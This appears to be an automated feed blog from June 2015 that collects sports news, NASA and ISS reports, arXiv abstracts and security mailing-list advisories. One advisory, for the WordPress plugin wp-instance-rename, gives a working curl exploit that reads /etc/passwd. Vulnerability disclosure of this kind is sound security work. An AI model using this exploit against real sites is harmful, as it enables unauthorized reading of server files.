Latest YouTube Video

Saturday, June 27, 2015

Paraguay again eliminates Brazil in Copa America quarters

CONCEPCION, Chile (AP) Paraguay beat Brazil 4-3 in a penalty shootout after a 1-1 draw Saturday night to advance to the semifinals of the Copa America, handing the five-time world champions yet another disappointment a year after the humiliating World Cup elimination at home.

from FOX Sports Digital http://ift.tt/1GI89vO
via IFTTT

Mexico rallies to tie Costa Rica 2-2 in Orlando

ORLANDO, Fla. (AP) Giovani Dos Santos and Javier Hernandez scored 2 minutes apart and Mexico overcame a shaky first half to tie Costa Rica 2-2 on Saturday in an exhibition game before the CONCACAF Gold Cup.

from FOX Sports Digital http://ift.tt/1CBzYnN
via IFTTT

Paraguay eliminates Brazil in Copa America quarterfinals

CONCEPCION, Chile (AP) Paraguay defeated Brazil 4-3 in a penalty shootout after a 1-1 draw on Saturday to advance to the semifinals of the Copa America.

from FOX Sports Digital http://ift.tt/1QWmsqR
via IFTTT

Anonymous: Si dedero

Anonymous: Si dedero. This digital print comes from The Si Placet Repertoire of 1480–1530 · Anonymous: Si dedero. Click for samples. Anonymous.

from Google Alert - anonymous http://ift.tt/1GT85LV
via IFTTT

I have a new follower on Twitter


Patrick Neeman
Digital Prophet. Interaction Designer. Whiskey Drinker. Runs http://t.co/NSfPstK2nU and http://t.co/6LJ2YCeO99.
Seattle, WA | Vancouver, BC
http://t.co/hm4pYtmjE3
Following: 19128 - Followers: 98303

June 27, 2015 at 04:06PM via Twitter http://twitter.com/usabilitycounts

Orioles: Saturday's game vs. Indians has been postponed (rain); split-admission DH on Sunday at 1:35 pm and 7:05 pm (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Classified Info Regarding Training Missions 9 - 11 (Contains Spoilers)

SECRET AGENTS ONLY: Classified Info Regarding Training Missions 9 - 11 (Contains Spoilers). By Anonymous on June 26, 2015 - 11:52. Greetings ...

from Google Alert - anonymous http://ift.tt/1LBSKnc
via IFTTT

Anonymous (@YourAnonCentral) | Twitter

The latest Tweets from Anonymous (@YourAnonCentral). We support the weak against the powerful. Casual propaganda. Information Jihad.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonCentral%3Flang%3Dta&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNGSaqLKlYNY137KwFcuIwOvocLsJQ
via IFTTT

Blatter: 'Liberating' to leave FIFA, expects 2016 election

GENEVA (AP) Sepp Blatter says his decision to leave FIFA was ''liberating'' and he expects the election to replace him will be in early 2016.

from FOX Sports Digital http://ift.tt/1LMO6Qd
via IFTTT

I have a new follower on Twitter


Charles Chaplin
Enjoy the best Charlie Chaplin Quotes..


Following: 213 - Followers: 33

June 27, 2015 at 06:39AM via Twitter http://twitter.com/CharliieChapln

Japan striker Okazaki joins Premier League club Leicester

LEICESTER, England (AP) Japan striker Shinji Okazaki has signed for English club Leicester and will become the seventh Japanese player to feature in the Premier League.

from FOX Sports Digital http://ift.tt/1TU44he
via IFTTT

World’s First 200Gb microSD Card Arrives

There isn't any troll in the title. The "World's Largest microSD" card sized at 200GB is now officially available for purchasing from Amazon and number of retailers. So, Is your 16GB, or 32GB, or even 64GB smartphone not enough to store all your data in one place? Order a Sandisk's new high-capacity microSD card from Amazon now. However, the only issue is that it is not exactly very


from The Hacker News http://ift.tt/1HmyBRt
via IFTTT

Ghana FA to challenge report on World Cup money

ACCRA, Ghana (AP) The Ghana Football Association says it will challenge some of the findings of an inquiry which questioned how over $3.5 million meant for the team's preparations for last year's World Cup was used.

from FOX Sports Digital http://ift.tt/1fM7McV
via IFTTT

Europol Arrests Gang Behind Zeus And SpyEye Banking Malware

The Law enforcement agencies from six different European countries have taken down a major Ukrainian-based cyber criminals gang suspected of developing, distributing and deploying Zeus and SpyEye banking malware. According to the report on the official website of Europol, authorities have arrested five suspects between June 18 and 19. All the five suspects are the members of an alleged


from The Hacker News http://ift.tt/1CA9Ppr
via IFTTT

Exoplanet Disks In Formation

These visualizations were developed using a simulation run from the SMACK (Superparticle-Method Algorithm for Collisions in Kuiper belts) code.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1HmhE9u
via IFTTT

Planet Aurora


What bizarre alien planet is this ? It's planet Earth of course, seen through the shimmering glow of aurorae from the International Space Station. About 400 kilometers (250 miles) above, the orbiting station is itself within the upper realm of the auroral displays, also watched from the planet's surface on June 23rd. Aurorae have the signature colors of excited molecules and atoms at the low densities found at extreme altitudes. The eerie greenish glow of molecular oxygen dominates this view. But higher, just above the space station's horizon, is a rarer red band of aurora from atomic oxygen. The ongoing geomagnetic storm began after a coronal mass ejection's recent impact on Earth's magnetosphere. via NASA http://ift.tt/1J9Ei2q

Friday, June 26, 2015

Orioles Highlight: Chris Davis singles in go-ahead run in 8th as Baltimore rallies vs. bullpen in 4-3 win over Indians (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Argentina tops Colombia 5-4 in shootout, reaches Copa semis

VINA DEL MAR, Chile (AP) Argentina defeated Colombia 5-4 on penalty kicks after a 0-0 tie Friday night and will play Brazil or Paraguay next week in the Copa America semifinals.

from FOX Sports Digital http://ift.tt/1CzA7Ih
via IFTTT

Argentina beats Colombia 5-4 on penalties to reach semis

VINA DEL MAR, Chile (AP) Argentina defeated Colombia 5-4 on penalties after a 0-0 draw on Friday to reach the semifinals of the Copa America.

from FOX Sports Digital http://ift.tt/1dmV9TY
via IFTTT

I have a new follower on Twitter


Raina Gray
Touch a scientist and you touch a child.
Spring Valley village, OH, USA

Following: 538 - Followers: 841

June 26, 2015 at 09:13PM via Twitter http://twitter.com/rainagray29

Orioles: SP Wei-Yin Chen recalled from Class A to start Friday against Indians; P TJ McFarland optioned to Triple-A (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] Response to Decision Group press release about security vulnerabilities in E-Detective Lawful Interception System

Two weeks ago I posted a security advisory[1] detailing severe security flaws in E-Detective, a "lawful" communications interception system. The vendor is a company called Decision Group and they claim on their website that their software is used by over 100 law enforcement agencies. A few days ago they posted a press release[2] to respond to an IBTimes article[3] that covered the security flaws. The mere fact that they responded to a news article about the security flaws instead of the original security advisory is telling of their attitude to security. An attitude that is unfortunately too common: that security is seen as an externality that affects its customers more than the company itself, so resources should only be devoted to it if it's a public relations issue. Nevertheless, their response is very much a non-response. It fails to express responsibility for the security holes, and instead deflects the responsibility on their customers. Excusing their broken English, here's a point-by-point response to their press release. >"Actually we are fully aware of such security concern since 4 years ago when our client asked to enhance the security level of E-Detective system." The fact that they've been fully aware of these security flaws for 4 years and failed to do something about them until recently is not exactly redeeming. That only makes it much, much worse. By their own admission they admit that third parties (their clients) have known about these vulnerabilities. Their clients (one of whom they claim to be the National Security Bureau of the Republic of China, which is effectively the Chinese NSA) buy their software for the purpose of degrading security. One can only shudder to imagine how many times these flaws have been attempted to be exploited for the purpose of collecting intercepts from other customers. >"The most important guideline of E-Detective deployment is that E-Detective should be deployed in the closed network domain without Internet access to outside world. This network domain should be also isolated from other corporate or government service network segment. By this way, only few authentic staff can access the internal system." A great example of how a false sense of security can be dangerous. Isolating services in their own network doesn't fix the security flaws nor make them impossible to exploit - it just makes it harder. There are countless ways that a private network can be compromised. No matter how tight your network is. To get any reasonable work done staff members will move data in and out of the network, even if your network is disconnected from the Internet. There are many entry points into a network, something which shouldn't really need to be explained to a company that sells surveillance software for a living if they are competent. Software compartmentalisation and network isolation is a good security practice, but it's not a substitute for fixing vulnerabilities or an excuse to run dangerously insecure software. Even if one was to make the (false) assumption that running E-Detective on an isolated network prevents vulnerabilities affected by it from being exploited: how many of those "100+" customers actually follow these guidelines or have a sane network setup that allows them to do this kind of isolation? Furthermore, the actual function of E-Detective means that it can never be on a fully isolated network. There will always be an entry point. E-Detective intercepts communications by using a man-in-the-middle proxy. That proxy will need to be connected to the network that the customer wants to intercept communications from. Based on the case studies that they list on their website, that network will also probably be connected to the Internet. Unless a human being is manually transferring data using external storage from the proxy to the E-Detective system, then the system will probably also be in some way connected to the proxy. >"Since all users of E-Detective are of 4 types: operator, administrator, auditor and datamvr. Operator has the authorized right to input queries and view the scope of intercepted data by his/her own right. Administrator can have authorized right to conduct the operation of system backup, user management, and software system tuning…etc. Auditor has the only right to check and view all log files in the system. The last type of user is only for data transport between different systems, and it cannot be used for system access. None of these users has the superuser right of root. In most cases, root is basically set to hibernation status after system is activated by license under customer SLA request in order to terminate security backdoor." All of this is made useless by a vulnerability that was discovered after the publication of the original security advisory. It turns out that features that the root user has access to are hidden from the menu of other users, but other users can still access those features by manually navigating to each feature's page. Even if the root user is deactivated after installation in "most cases", this still doesn't address the fact that the system backup feature uses a static key, which can be exploited to perform remote code execution. >"Besides, E-Detective can be integrated with OTP server for more secured access control, and all logon access record will be reviewed in OTP server for auditing. Biometric access mechanism module with fingerprint can be also available by customer request, but it depends on whether the fingerprint reader is supported on user workstation." The system is so dangerously insecure beyond easy repair at this point that I feel sorry for anyone that has to trust it with their biometric data. >"After all, E-Detective system is used by our customer for network forensic purpose, such as internal data leakage protection, cyber evidence collection and lawful interception. System security is always the top priority for our customer. All the vulnerabilities mentioned in the news by International Business Times have been fixed several months ago. “Customer IT security is always our top concern,” said Casper Kan Chang, CEO of Decision Group, “and we have already fixed all the vulnerabilities in this current version of E-Detective for more than 11 months.” For those existing customers with old version of system still has concern, Decision Group will update it for free without hesitation." If IT security is "always" their top concern, why did it take them 3 years to (claim to) fix these vulnerabilities? Have they proactively contacted the customers that are running insecure versions of their software, or are they waiting for their customers to contact them? [1] http://ift.tt/1IURHyd [2] http://ift.tt/1fKI4Wc [3] http://ift.tt/1ImDy7g Mustafa Al-Bassam https://musalbas.com https://twitter.com/musalbas

Source: Gmail -> IFTTT-> Blogger

[FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-12 Download Site: http://ift.tt/1Jh6ovB Vendor: Vlajo Vendor Notified: 2015-06-12 Advisory: http://ift.tt/1Nh6dij Vendor Contact: Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page. Vulnerability: The code in mysqldump_download.php doesn't check that the requested file is within the intended download directory: try{ $dbname = $_GET["dbname"]; $dumpfname = $_GET["dumpfname"]; $backup_folder = $_GET["backup_folder"]; }catch (Exception $e){} if(empty($backup_folder)){ $backup_folder="backup/"; } echo "$dumpfname"; if (file_exists($dumpfname)) { // zip the dump file $name=$dbname . "_" . date("Y-m-d"); $zipfname = $backup_folder.$name.".zip"; $zip = new ZipArchive(); if($zip->open($zipfname,ZIPARCHIVE::CREATE)) { $zip->addFile($dumpfname,$dumpfname); $zip->close(); } // read zip file and send it to standard output if (file_exists($zipfname)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($zipfname)); flush(); readfile($zipfname); CVEID: 2015-4703 OSVDB: Exploit Code: • curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=." http://ift.tt/1fKI74C -o p.zip

Source: Gmail -> IFTTT-> Blogger

[FD] Remote file download vulnerability in download-zip-attachments v1.0

Title: Remote file download vulnerability in download-zip-attachments v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-10 Download Site: http://ift.tt/1Jh6ovx Vendor: rivenvirus Vendor Notified: 2015-06-15 Vendor Contact: http://ift.tt/1Nh6bHd Advisory: http://ift.tt/1Jh6ovz Description: Download all attachments from the post into a zip file. Vulnerability: from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory.

Orioles: Minor league RHP Dennis Torres given 50-game suspension for 2nd violation of drug prevention program (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Boca president says Tevez is returning to Buenos Aires club

BUENOS AIRES, Argentina (AP) The president of Boca Juniors says Carlos Tevez is leaving Juventus to return to the Buenos Aires club.

from FOX Sports Digital http://ift.tt/1GCcAHt
via IFTTT

This Unbreakable Encryption Could Save the Internet

The Awareness to encrypt your private data, chat conversations as well as communication is booming like never before that soon the world will mark some day as the International Encryption Day. This may or may not be possible in future, but Toshiba is all set to create a next level of encryption technology that the firm claims is absolutely unbreakable and "completely secure from tapping".


from The Hacker News http://ift.tt/1dlrFWH
via IFTTT

Martial signs new contract with Monaco

MONACO (AP) Up-and-coming striker Anthony Martial has extended his contract with Monaco until 2019.

from FOX Sports Digital http://ift.tt/1GO3KJU
via IFTTT

I have a new follower on Twitter


Joshua R. Williams
Healthcare IT Pro, Avid Investor, Former COO @PlayPwP, Wordsmith, News/Book Junkie... Detroit #Tigers fan, runner, biker, guitar shamer... My tweets are mine.
Michigan, USA
http://t.co/TzbsprnwnA
Following: 1851 - Followers: 1899

June 26, 2015 at 11:25AM via Twitter http://twitter.com/JRDubbleU

Cloud Source Repositories: Google Quietly Launches GitHub Competitor

After the death of Google code this winter, Google is apparently back in the business through the launch of its private Git repository hosting service on Google Cloud Platform called Cloud Source Repositories. Not yet officially announced, but Google started providing free beta access to its new Cloud Source Repositories earlier this year, VentureBeat reported.<!-- adsense --> Similar to the


from The Hacker News http://ift.tt/1Nj98q7
via IFTTT

West Ham signs France midfielder Payet from Marseille

LONDON (AP) West Ham has signed France midfielder Dimitri Payet for a fee of more than 10 million pounds ($15.7 million) after Marseille reluctantly accepted an offer from the English club.

from FOX Sports Digital http://ift.tt/1NlJpOy
via IFTTT

ISS Daily Summary Report – 6/25/15

Ocular Health: Padalka executed his Medical Operations Flight Day 90 (FD90) Ocular Health activities with Kelly’s assistance.  Padalka performed Optical Coherence Tomography (OCT) and ocular ultrasound and later today will execute fundoscope measurements with Kelly as operator. OCT is used to measure retinal thickness, volume, and retinal nerve fiber layer, and fundoscopy is used to obtain images of the retinal surface. The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risk of microgravity-induced visual impairment/intracranial pressure in ISS crewmembers. Researchers believe that the measurement of visual, vascular and central nervous system changes over the course of this experiment and during the subsequent post-flight recovery will assist in the development of countermeasures, clinical monitoring strategies, and clinical practice guidelines. Integrated Resistance and Aerobic Training Study (Sprint):  Kelly, with Padalka assisting, configured video, Ultrasound 2 machine, and donned the calf and thigh reference guides for his FD90 Sprint Ultrasound.  Kelly then performed thigh and calf scans with guidance from the Sprint ground team.  Sprint evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Ultrasound scans are used to evaluate spaceflight-induced changes in the muscle volume. Fine Motor Skills: Kelly and Kornienko executed their FD90 Fine Motor Skills experiment this morning between one and four hours of wakeup.  In the Fine Motor Skills experiment, crew members perform a series of interactive tasks on a touchscreen tablet. The investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. The goal of Fine Motor Skills is to answer how fine motor performance in microgravity trend/vary over the duration of a six-month and year-long space mission; how fine motor performance on orbit compare with that of a closely matched participant on Earth; and how performance trend/vary before and after gravitational transitions, including the periods of early flight adaptation, and very early/near immediate post-flight periods. SpaceX (SpX)-7 Preparations: Kelly and Padalka completed another session of On Board Training (OBT) with the robotics trainer to prepare for capture/berthing of the Dragon vehicle. Today they practiced a 30 meter approach and two capture point hold runs. SpX-7 launch is planned for Sunday, June 28 with berthing on Tuesday, June 30. Ground Camera Calibration – Ground controllers performed a calibration of ISS external cameras today, in preparation for SpaceX-7 arrival.  The purpose of the calibration is to make sure that the overlays displayed by the Robotics Workstation line up properly with the video images during SpaceX-7 approach and capture.  Today’s activity gathered data on the camera pan and tilt calibration.  Using this data, ground teams determined that the camera calibrations are within limits and no adjustments are needed. Today’s Planned Activities All activities were completed unless otherwise noted. SLEEP questionnaire SPLANKH. Experiment ops. SLEEP questionnaire ОСТ – hardware prep ОСТ – eye scan ОСТ – hardware stow USND2- activation Fine Motor Skills – experiment FINEMOTR – experiment ops Eye ultrasound – hardware prep Eye ultrasound СОЖ Maintenance Eye ultrasound – data transfer Preparing LAB Camcorder in LAB RWS Mon 1 for Earth observation ОTKLIK. Instrumentation monitoring Eye ultrasound – closeout ops SPRINT- hardware setup SPRINT- experiment ops assist SPLANKH. Repeat bio-chemical blood analysis. SPLANKH. Closeout ops. USND2- deactivation Dragon rendezvous and berthing OBT procedures self-study URAGAN. Observation and photography using [НА ВСС] science instrumentation SPLANKH. Experiment ops PROBOI. [АР] teardown and connecting cables RGN – water transfer to EDV (start) Fundoscopic eye exam – hardware prep IMS update Fundoscopic eye exam – pupil dilation SYN_MUSCL- photo registry RGN – water transfer to EDV (end) Fundoscopic eye exam CONTENT. Experiment ops Crew conference with Astronaut Office Flight Director conference Fundoscopic eye exam – hardware stow Completed Task List Items None  Ground Activities All activities were completed unless otherwise noted. SPRINT Ocular Health Dragon OBT Camera Calibration Three-Day Look Ahead: Friday, 06/26: Crew off duty Saturday, 06/27: Housekeeping, Crew off duty Sunday, 06/28: Crew off duty, SpX-7 launch QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1BGW2Cs
via IFTTT

Swiss court denies bail release for detainee in FIFA case

BELLINZONA, Switzerland (AP) Switzerland's Federal Criminal Court has rejected a request for release on bail by one of the seven men arrested on corruption charges last month in a raid on FIFA's luxury hotel in Zurich.

from FOX Sports Digital http://ift.tt/1RCrxzD
via IFTTT

FIFA: Blatter not making U-turn on pledge to leave office

ZURICH (AP) FIFA President Sepp Blatter has not made a U-turn on his plans to leave office, the governing body said Friday.

from FOX Sports Digital http://ift.tt/1eLHTdb
via IFTTT

[FD] SEC Consult SA-20150626-0 :: Critical vulnerabilities in Polycom RealPresence Resource Manager (RPRM) allow surveillance on conferences

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Mainz open to offers for Jara after incident with Cavani

BERLIN (AP) Mainz will listen to offers for Gonzalo Jara following the Chile defender's provocation of Uruguay's Edinson Cavani in the Copa America quarterfinals.

from FOX Sports Digital http://ift.tt/1NlwFr3
via IFTTT

Rival factions choose 2 venues for Pakistan soccer elections

ISLAMABAD (AP) The battle for power in Pakistan soccer is expected to get more complicated as voters could split at two different venues next Tuesday to elect a president of the Pakistan Football Federation.

from FOX Sports Digital http://ift.tt/1eLzEOb
via IFTTT

Facebook Can Recognize You Even if You Don't Show Your Face

Well, this is incredible and scary both at the same time. Forget about "facial" recognition; Facebook's newest technology is way good at identifying you in photos even without the need to see your face. The New Scientist is reporting about the Facebook's new "experimental" facial recognition algorithm which is so powerful that it can identify you in photos even when your faces are hidden.


from The Hacker News http://ift.tt/1TR7dym
via IFTTT

You Can Now Use Messenger App without a Facebook Account

Don't have Facebook account but want to use its Messenger service? Then go for it because Mark Zuckerberg wants even the people who hate Facebook to use the social network's separate Messenger service. So, you no longer need an active Facebook account to make use of the Messenger service, all you need is just your name and phone number, the company announced today. <!-- adsense -->


from The Hacker News http://ift.tt/1KgEcsV
via IFTTT

France May Offer Asylum to Edward Snowden and Julian Assange

In wake of the latest revelations about the National Security Agency (NSA) global spying on country’s leaders, France may decide to offer political asylum to whistleblowers Edward Snowden and Julian Assange, as a "symbolic gesture." Former NSA contractor Edward Snowden, who is facing criminal espionage charges in the U.S., has remained in Russia for almost two years after exposing the


from The Hacker News http://ift.tt/1BQU7eV
via IFTTT

Star Trails Above Table Mountain


Stars trail above and urban lights sprawl below in this moonlit nightscape from Cape Town, South Africa, planet Earth. The looming form of Table Mountain almost seems to hold terrestrial lights at bay while the stars circle the planet's South Celestial Pole. This modern perspective on the natural night sky was captured in June 2014, the scene composed of over nine hundred, stacked 30 second exposures. The stunning result was chosen as the winner in the Against the Lights category, a selection from over 800 entries in The World at Night's 2015 International Earth and Sky Photo Contest. via NASA http://ift.tt/1e5iHNQ

Thursday, June 25, 2015

Guerrero scores 3 and Peru beats Bolivia 3-1 to reach semis

TEMUCO, Peru (AP) A Paulo Guerrero hat trick led Peru to a 3-1 win against Bolivia on Thursday, securing a place in the semifinals of the Copa America.

from FOX Sports Digital http://ift.tt/1KexT7w
via IFTTT

Cascade hash tables: a series of multilevel double hashing schemes with O(1) worst case lookup time. (arXiv:cs/0608037v3 [cs.DS] UPDATED)

In this paper, the author proposes a series of multilevel double hashing schemes called cascade hash tables. They use several levels of hash tables. In each table, we use the common double hashing scheme. Higher level hash tables work as fail-safes of lower level hash tables. By this strategy, it could effectively reduce collisions in hash insertion. Thus it gains a constant worst case lookup time with a relatively high load factor(70%-85%) in random experiments. Different parameters of cascade hash tables are tested.



from cs.AI updates on arXiv.org http://ift.tt/1LHMmIa
via IFTTT

Spectral Ranking using Seriation. (arXiv:1406.5370v2 [cs.LG] UPDATED)

We describe a seriation algorithm for ranking a set of items given pairwise comparisons between these items. Intuitively, the algorithm assigns similar rankings to items that compare similarly with all others. It does so by constructing a similarity matrix from pairwise comparisons, using seriation methods to reorder this matrix and construct a ranking. We first show that this spectral seriation algorithm recovers the true ranking when all pairwise comparisons are observed and consistent with a total order. We then show that ranking reconstruction is still exact when some pairwise comparisons are corrupted or missing, and that seriation based spectral ranking is more robust to noise than classical scoring methods. Finally, we bound the ranking error when only a random subset of the comparions are observed. An additional benefit of the seriation formulation is that it allows us to solve semi-supervised ranking problems. Experiments on both synthetic and real datasets demonstrate that seriation based spectral ranking achieves competitive and in some cases superior performance compared to classical ranking methods.



from cs.AI updates on arXiv.org http://ift.tt/1p7LaGZ
via IFTTT

A Theory of Formal Synthesis via Inductive Learning. (arXiv:1505.03953v2 [cs.AI] UPDATED)

Formal synthesis is the process of generating a program satisfying a high-level specification. In recent times, effective formal synthesis methods have been proposed based on the use of inductive learning. We refer to this class of methods that learn programs from examples as formal inductive synthesis. In this paper, we present a theoretical framework for formal inductive synthesis. We discuss how formal inductive synthesis differs from traditional machine learning. We then describe oracle-guided inductive synthesis (OGIS), a class of synthesizers that operate by iteratively querying an oracle. An instance of OGIS that has had much practical impact is counterexample-guided inductive synthesis (CEGIS). We present a theoretical characterization of CEGIS for learning any program that computes a recursive language. In particular, we analyze the relative power of CEGIS variants where the types of counterexamples generated by the oracle varies. We also consider the impact of bounded versus unbounded memory available to the learning algorithm. In the special case where the universe of candidate programs is finite, we relate the speed of convergence to the notion of teaching dimension studied in machine learning theory. Altogether, the results of the paper take a first step towards a theoretical foundation for the emerging field of formal inductive synthesis.



from cs.AI updates on arXiv.org http://ift.tt/1EUN3JL
via IFTTT

Orioles Highlight: Steve Pearce makes great catch, Matt Wieters 2-run HR in 8-6 victory over Red Sox (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Paraguay revokes immunity for soccer headquarters

ASUNCION, Paraguay (AP) Paraguay's president has signed a law repealing the immunity that the headquarters of South America's soccer confederation enjoyed for nearly two decades.

from FOX Sports Digital http://ift.tt/1Guc1R5
via IFTTT

[FD] SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS

=============================================================================================== SBA Research Vulnerability Disclosure  =============================================================================================== title: Koha Unauthenticated SQL injection product:         Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website:         http://ift.tt/1Jm1WM2 found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact:         cst@sba-research.org References: http://ift.tt/1FDcmzb         http://ift.tt/1Jm1WM3         http://ift.tt/1FDcmzd         http://ift.tt/1Jm1VI0         http://ift.tt/1FDcmPL         http://ift.tt/1Jm1VI2         http://ift.tt/1FDcmPN         http://ift.tt/1Jm1WM9         ​http://ift.tt/1FDcn61 =============================================================================================== ========================= 1. Mutiple SQL Injections ========================= + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + Vulnerability:

Source: Gmail -> IFTTT-> Blogger

Orioles: RHP Miguel Gonzalez has been reinstated from 15-day DL; RHP Mychal Givens optioned to Double-A (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Adobe Releases Emergency Patch for Flash Zero-Day Vulnerability

Adobe has rolled out an emergency software patch for its Flash Player to patch a critical zero-day vulnerability that is already exploited by the hackers in the wild. The company said the flaw could potentially allow hackers to take control of the affected system and that it had evidence of "limited, targeted attacks" exploiting the flaw. Therefore, Adobe is urging users and


from The Hacker News http://ift.tt/1LFYn0P
via IFTTT

[FD] Recomendation: Flaw in K9 Web Protection 4.4.268

A flaw exist in K9 Web Protection version 4.4.268 that allow any user to bypass the K9 Web Protection filter by using proxies. Proxies are well known to bypass ISP filters as well any parental block aplication such as K9 Web Protection. For this test we have run 638 listed proxies and 25 could bypass the "Proxy Avoidance" category because they were incorrectly categorized.

Source: Gmail -> IFTTT-> Blogger

Jara could face suspension for provoking Cavani

SANTIAGO, Chile (AP) South American football officials will look into the actions of Chile defender Gonzalo Jara, who was caught by TV cameras poking Edinson Cavani's behind to provoke a red card in the quarterfinals of the Copa America.

from FOX Sports Digital http://ift.tt/1BDKjEI
via IFTTT

News: Icarus: The Pluto System on the Eve of New Horizons

We are offering Promotional Access* to the Special Issue for July to coincide with the closest approach of New Horizons to Pluto
The Pluto System on the Eve of New Horizons Volume 246, Pages 1-374 (15 January 2015)
Guest editors: Fran Bagenal, Bonnie Buratti, Randy Gladstone, Will Grundy and Alan Stern.



from Icarus http://ift.tt/1KcGx6s
via IFTTT

Set Anonymous User Commenting by Default?

Hello, I was wondering if there is a way that I can make user comments show up as anonymous by default, using either a module, or some drupal ...

from Google Alert - anonymous http://ift.tt/1GtveCv
via IFTTT

New Pics Added to the Blog Gallery! (June 25, 2015)

BRCartoon2forBlog
New Pics Added to the Blog Gallery! (June 25, 2015)

Click link below to visit gallery now!
http://ift.tt/1HAGoHC




from The 'hotspot' for all things Bob Ross. http://ift.tt/1LEYyJN
via IFTTT

ISS Daily Summary Report – 06/24/15

Microbiome: Kelly collected samples in support of the Microbiome experiment which were then inserted into Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for later return.  The Microbiome experiment investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time). To monitor the status of the crewmembers’ microbiome and immune system and their interaction with the unique environment of the ISS, periodic samples from different parts of the body and the surrounding ISS environment are taken. As part of this study, the likelihood and consequences of alterations in the microbiome due to extreme environments, and the related human health risk, will be assessed. SUPVIS-E Troubleshooting: Kelly conducted a conference with SUPVIS-E specialists, then with the ground assistance, successfully performed troubleshooting on the laptop in an attempt to regain connectivity and allow proper communication between the laptop and ground. ESA ground controllers will continue with commanding and checkout of the laptop.  SUPVIS-E aims at simulating selected future Human exploration scenarios including immersive remote control of a robot by an astronaut in orbit around a target object (such as Mars or the Moon). A crew member will control the ESA test rover located at ESOC (Germany) in near real time. SpaceX (SpX)-7 Preparations: Kelly and Padalka completed another session of On Board Training (OBT) with the robotics trainer to prepare for capture/berthing of the Dragon vehicle. Today they practiced a 30 meter approach and two capture point hold runs. SpX-7 launch is planned for Sunday, June 28 with berthing on Tuesday, June 30.  Today’s Planned Activities All activities were completed unless otherwise noted. SLEEP Questionnaire Self-Reaction Test. Reaction Time Test (morning) BIOME – Survey Completion Biochemical Urine Test URISYS Hardware Stowage HRF. Sample MELFI Insertion Intermodular TORU Test with Docked Progress 425 (AO) PROBOY. RSЕ1 Laptop Ops. PROBOY. Penetration Simulator Ops. HMS Defibrillator Inspection BIOME. Sample collection HRF. Sample MELFI Insertion BIOME – Equipment stowage after sample collection WRM Ops PROBOY. Copy and Downlink Data MOTOCARD. Experiment Ops. MOTOCARD. Assistance with the Experiment WRS – Recycle Tank Fill Vision Test WRS – Recycle Tank Fill Vision Test –  Complete Questionnaire Dragon Approach and Berthing OBT using ROBoT, Session 1 СОЖ Maintenance WRS – Recycle Tank Fill Mating umbilicals to ARIS RGN REC-TNK – Removal of depress hose for nominal operations SPLANH. Preparation for Experiment WRS – Recycle Tank Fill Self-Reaction Test. Reaction Time Test Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. OBT Dragon RoBOT N2 Distribution System Leak Check [In Work] Three-Day Look Ahead: Thursday, 06/25: Ocular Health, Dragon OBT RoBOT, Sprint Friday, 06/26: Crew off duty Saturday, 06/27: Housekeeping, Crew off duty QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1eIZGSj
via IFTTT

Swiss champion Basel signs Austria forward Marc Janko

